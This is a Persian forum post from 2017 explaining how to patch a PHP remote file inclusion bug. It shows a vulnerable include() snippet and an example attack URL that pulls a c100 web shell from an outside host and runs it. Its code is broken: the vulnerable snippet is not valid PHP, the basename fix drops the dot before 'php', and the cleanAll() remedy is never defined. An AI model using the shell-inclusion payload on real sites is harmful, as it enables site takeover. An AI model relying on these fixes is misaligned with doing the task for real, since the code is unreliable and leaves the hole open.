Patch Bug Rfi - نسخهی قابل چاپ +- انجمن های تخصصی فلش خور (http://www.flashkhor.com/forum) +-- انجمن: رایانه (http://www.flashkhor.com/forum/forumdisplay.php?fid=27) +--- انجمن: امنیت و روش های مقابله با هـک (http://www.flashkhor.com/forum/forumdisplay.php?fid=85) +--- موضوع: Patch Bug Rfi (/showthread.php?tid=264677) |
Patch Bug Rfi - امیرحسین - 05-03-2017 خوب با اموزش پچ باگ rfi درخدمتتون هستم این باگ ضریب خطر بالایی دارد چون باعث میشود که نفوذگر بتواند شلر خود را ران کند یا کارهای دیگر انجام دهد بسته به خلاقیت هکر اما بیشتر از این باگ برای اپلود شل استفاده میشود خوب بریم سراغ بحث اصلیمون این باگ در اثر استفاده نادرست از توابع زیر اتفاق میفتد: Require Require_once Include Include_once Virtual کد اسیب پذیر(دارای باگ rfi) کد PHP: <?php id=$_GET(“id”); Include(“id”); ?> خوب همنطور که مشاهده میکنید شما میتوانید فایل مورد نظر خود را به راحتی ران کنید مثلا فایل page.php فایل مورد نظر یک برنامه نویس است که به این صورت فراخوانی میشود دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید. http://www.site.com/index.php?id=page.php خوب اینجا فایل مورد نظر برنامه نویس اجرا میشه اگه فایل مورد نظر نفوزگر باشد مثل: دیدن لینک ها برای شما امکان پذیر نیست. لطفا ثبت نام کنید یا وارد حساب خود شوید تا بتوانید لینک ها را ببینید. http://www.site.com/index.php?id=http://.../c100.txt? اینجا ما اومدیم و شل خودمون رو ران کردیم حالا دیگه هرکاری بخوایم میتونیم انجام بدیم اما بحث اصلی ما پچ این باگ است ما با استفاده از تابع basename() این باگ رو پچ میکنیم کد پس از اصلاح: کد PHP: include (basename($_GET['id']."php")); یا استفاده از تابع cleanall() کد اصلاح شده با این تابع کد PHP: <?php $id = cleanAll($_GET[id]); include($id); ?> خوب امیدوارم برای دوستان مفید واقع شده باشه |